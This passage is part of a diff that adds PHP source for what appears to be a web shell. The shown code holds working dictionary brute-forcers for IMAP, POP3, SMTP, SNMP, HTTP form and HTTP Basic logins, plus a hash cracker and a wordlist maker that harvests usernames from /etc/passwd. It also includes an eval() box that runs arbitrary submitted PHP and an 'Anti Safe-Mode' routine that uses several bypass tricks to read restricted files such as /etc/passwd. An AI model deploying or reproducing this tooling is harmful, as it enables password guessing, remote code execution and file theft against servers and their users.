+}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$imap=imaplogiN($target,$user,$pass); +if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ +if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}IMAP cracker:$crack"; +} +function snmpcrackeR(){ +global $t,$et,$errorbox,$crack,$hcwd; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +$com=trim(fgets($dictionary)," \n\r"); +$res=snmpchecK($target,$com,2); +if($res)echo "$com<br>"; +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else 
echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function pop3crackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$pop3=pop3logiN($target,$user,$pass); +if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}POP3 cracker:$crack"; +} +function smtpcrackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); 
+$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$smtp=smtplogiN($target,$user,$pass,5); +if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}SMTP cracker:$crack"; +} +function formcrackeR(){ +global $errorbox,$footer,$et,$hcwd; +if(!empty($_REQUEST['start'])){ +$url=$_REQUEST['target']; +$uf=$_REQUEST['userf']; +$pf=$_REQUEST['passf']; +$sf=$_REQUEST['submitf']; +$sv=$_REQUEST['submitv']; +$method=$_REQUEST['method']; +$fail=$_REQUEST['fail']; +$dic=$_REQUEST['dictionary']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); +$dictionary=fopen($dic,'r'); +echo "<font color=blue>Cracking started...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$url.="?$uf=$user&$pf=$pass&$sf=$sv"; +$res=check_urL($url,$method,$fail,12); +if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;} +flusheR(); +} +fclose($dictionary); +echo "Done!</font><br>"; +} +else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input 
type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>"; +} +function hashcrackeR(){ +global $errorbox,$t,$et,$hcwd; +if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && 
!empty($_REQUEST['type'])){ +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +$hash=strtoupper($_REQUEST['hash']); +echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR(); +$type=($_REQUEST['type']=='MD5')?'md5':'sha1'; +while(!feof($dictionary)){ +$word=trim(fgets($dictionary)," \n\r"); +if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;} +} +echo "Done!</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function pr0xy(){ +global $errorbox,$et,$footer,$hcwd; +echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>"; +if (!empty($_REQUEST['urL'])){ +$dir=""; +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); +$url=@fsockopen($host, 80, $errno, $errstr, 
12); +if(!$url)die("<br>$errorbox Can not connect to host!$et$footer"); +fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +while(!feof($url)){ +$con = fgets($url); +$con = str_replace("href=mailto","HrEf=mailto",$con); +$con = str_replace("HREF=mailto","HrEf=mailto",$con); +$con = str_replace("href=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +echo $con; +} +fclose($url); +} +} +function mysqlclienT(){ +global $t,$errorbox,$et,$hcwd; +if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ +$server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; +if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB']; +$link = @mysql_connect($server,$user,$pass); 
+if($link){ +if (!empty($db))mysql_select_db($db); +$result=mysql_query($query,$link); +echo "${t}Query result(s):$et"; +echo "<font color=blue><pre>"; +while($data=mysql_fetch_row($result)){ +foreach($data as $v) { +echo $v; +echo "\t"; +} +echo "\n"; +} +echo "</pre></font>"; +mysql_close($link); +} +else{ +echo "$errorbox Login failed!$et<br>"; +} +} +echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>"; +} +function phpevaL(){ +global $t,$hcwd; +if (!empty($_REQUEST['code'])){ +echo "<center><textarea rows=\"10\" cols=\"64\">"; +$code = str_replace("<?php","",$_REQUEST['code']); +$code = 
str_replace("<?","",$code); +$code = str_replace("?>","",$code); +htmlspecialchars(eval($code)); +echo "</textarea></center><br>"; +} +echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>"; +} +function whoiS(){ +global $t,$hcwd; +if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){ +$server =$_REQUEST['server']; +$domain=$_REQUEST['domain']."\r\n"; +$ser=fsockopen($server,43,$en,$es,5); +fputs($ser,$domain); +echo "<pre>"; +while(!feof($ser))echo fgets($ser); +echo "</pre>"; +fclose($ser); +} +else{ +echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>"; +} +} +function hexvieW(){ +if (!empty($_REQUEST['filE'])){ +$f = $_REQUEST['filE']; +echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" 
bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>"; +$file = fopen($f,"r"); +$i= -1; +while (!feof($file)) { +$ln=''; +$i++; +echo "<tr><td width=\"10%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>"; +echo "<td width=\"25%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +for ($j=0;$j<=7;$j++){ +if (!feof($file)){ +$tmp = strtoupper(dechex(ord(fgetc($file)))); +if (strlen($tmp)==1) $tmp = "0".$tmp; +echo $tmp." "; +$ln.=$tmp; +} +} +echo "</td><td width=\"25%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +for ($j=7;$j<=14;$j++){ +if (!feof($file)){ +$tmp = strtoupper(dechex(ord(fgetc($file)))); +if (strlen($tmp)==1) $tmp = "0".$tmp; +echo $tmp." "; +$ln.=$tmp; +} +} +echo "</td><td width=\"40%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +$n=0;$asc="";$co=0; +for ($k=0;$k<=16;$k++){ +$co=hexdec(substr($ln,$n,2)); +if (($co<=31)||(($co>=127)&&($co<=160)))$co=46; +$asc.= chr($co); +$n+=2; +} +echo htmlspecialchars($asc); +echo "</td></tr>"; +} +} +fclose($file); +echo "</table>"; +} +function safemodE(){ +global $windows,$t,$hcwd; +if (!empty($_REQUEST['file'])){ +$i=1; +echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n"; +ini_restore("safe_mode");ini_restore("open_basedir"); +$tmp = file_get_contents($_REQUEST['file']); +echo $tmp; +$i++; +echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n"; +$tmp=tempnam("","cx"); +copy("compress.zlib://".$_REQUEST['file'], $tmp); +$fh = fopen($tmp, "r"); +$data = fread($fh, filesize($tmp)); +fclose($fh); +echo $data; +$i++; +if(function_exists("curl_init")){ +echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n"; +$fh = @curl_init("file://".$_REQUEST['file'].""); +$tmp = @curl_exec($fh); +echo $tmp; +$i++; +echo "\n</font><font 
color=green>Method $i:(curl_init)[B]</font><font color=blue>\n"; +$i++; +if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR)) +$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__); +else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +} +if($_REQUEST['file'] == "/etc/passwd"){ +echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n"; +for($uid=0;$uid<99999;$uid++){ +$h=posix_getpwuid($uid); +if (!empty($h))foreach($h as $v)echo "$v:";}} +$i++; +echo "</pre></font>"; +} +echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>"; +} +function crackeR(){ +global $et; +$cwd = getcwd(); +echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>"; +} +function dicmakeR(){ +global $errorbox,$windows,$footer,$t,$et,$hcwd; +if 
(!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0; +if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ +$min = $_REQUEST['min']; +$max = $_REQUEST['max']; +if($max<$min)die($errorbox ."Bad input!$et". $footer); +$s =$w=""; +$out = $_REQUEST['output']; +$r = ($_REQUEST['range']=='a' )?'a':'A'; +if ($_REQUEST['range']==0) $r=0; +for($i=0;$i<$min;$i++) $s.=$r; +$dic = fopen($out,'a'); +if(is_nan($r)){ +while(strlen($s)<=$max){ +$w = $s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +else{ +while(strlen($w)<=$max){ +$w =(string)str_repeat("0",($min - strlen($s))).$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +fclose($dic); +echo "<font color=blue>Done</font>"; +} +if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ +$input=fopen($_REQUEST['input'],'r'); +if (!$input){ +if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; +else{ +$input=explode("\n",shelL("cat $input")); +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +foreach ($input as $in){ +$user = $in; +$user = trim(fgets($in)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "<font color=blue>Done</font>"; +} +} +} +else{ +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +while (!feof($input)){ +$user = trim(fgets($input)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "<font color=blue>Done</font>"; +} +else echo $errorbox." 
Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; +} +}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ +$res=downloadiT($_REQUEST['url'],$_REQUEST['output']); +if($combo && $res){ +$file=file($_REQUEST['output']); +$output=fopen($_REQUEST['output'],'w'); +foreach ($file as $v)fwrite($output,"$v:$v\n"); +fclose($output); +} +echo "<font color=blue>Done</font>"; +}else{ +$temp=whereistmP(); +echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td 
bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";} +} +function calC(){ +global $t,$et,$hcwd; +$fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode'); +if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ +echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">"; +if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else 
for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i}))); +echo "</textarea>$et</center><br>"; +} +echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>"; +} +function authcrackeR(){ +global $errorbox,$et,$t,$crack,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$data=''; +$method=($_REQUEST['method'])?'POST':'GET'; +if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} +spliturL($_REQUEST['target'],$host,$page); +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if($method='GET')$page.=$data; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +echo "<font color=blue>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} 
+$so=fsockopen($host,80,$en,$es,5); +if(!$so){echo "$errorbox Can not connect to host$et";break;} +else{ +$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); +if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data); +$packet.="\r\n\r\n"; +$packet.=$data; +fputs($so,$packet); +$res=substr(fgets($so),9,2); +fclose($so); +if($res=='20')echo "U: $user P: $pass</br>"; +flusheR(); +} +} +echo "Done!</font>"; +}else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function sqlcrackeR(){ +global $errorbox,$t,$et,$crack; +if (!function_exists("mysql_connect")){ +echo "$errorbox Server does n`t support MySQL$et"; +} +else{ +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ 
